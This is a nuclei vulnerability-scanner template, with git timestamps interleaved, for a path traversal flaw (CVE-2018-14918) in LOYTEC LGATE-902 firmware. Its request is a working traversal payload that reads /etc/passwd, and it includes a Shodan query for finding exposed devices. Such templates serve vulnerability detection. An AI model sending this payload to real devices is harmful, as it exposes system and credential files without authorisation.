nuclei-templates/http/cves/2018/CVE-2018-14918.yaml

48 lines
1.8 KiB
YAML
Raw Normal View History

2022-06-16 09:02:28 +00:00
id: CVE-2018-14918
info:
name: LOYTEC LGATE-902 6.3.2 - Local File Inclusion
2022-06-16 09:02:28 +00:00
author: 0x_Akoko
severity: high
description: |
LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.
2023-09-06 12:57:14 +00:00
remediation: |
Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability.
2022-06-16 09:02:28 +00:00
reference:
- https://seclists.org/fulldisclosure/2019/Apr/12
- http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-14918
2022-06-16 09:02:28 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-14918
cwe-id: CWE-22
epss-score: 0.44897
epss-percentile: 0.96986
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:*
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:57:14 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: loytec
product: lgate-902_firmware
2023-09-06 12:57:14 +00:00
shodan-query: http.html:"LGATE-902"
tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate
2022-06-16 09:02:28 +00:00
http:
2022-06-16 09:02:28 +00:00
- method: GET
path:
- "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
2022-06-20 19:20:56 +00:00
matchers-condition: and
2022-06-16 09:02:28 +00:00
matchers:
- type: regex
part: body
2022-06-16 09:02:28 +00:00
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a004830460221008f3b5aea4b7a19edc3858357bd6fcf4e30225a41bc486ab3953f62b412ec213e0221009a559cf00ea6a4334abe4ba1ae088e0838d185ab139e5b32982a60d988cdea43:922c64590222798bb761d5b6d8e72950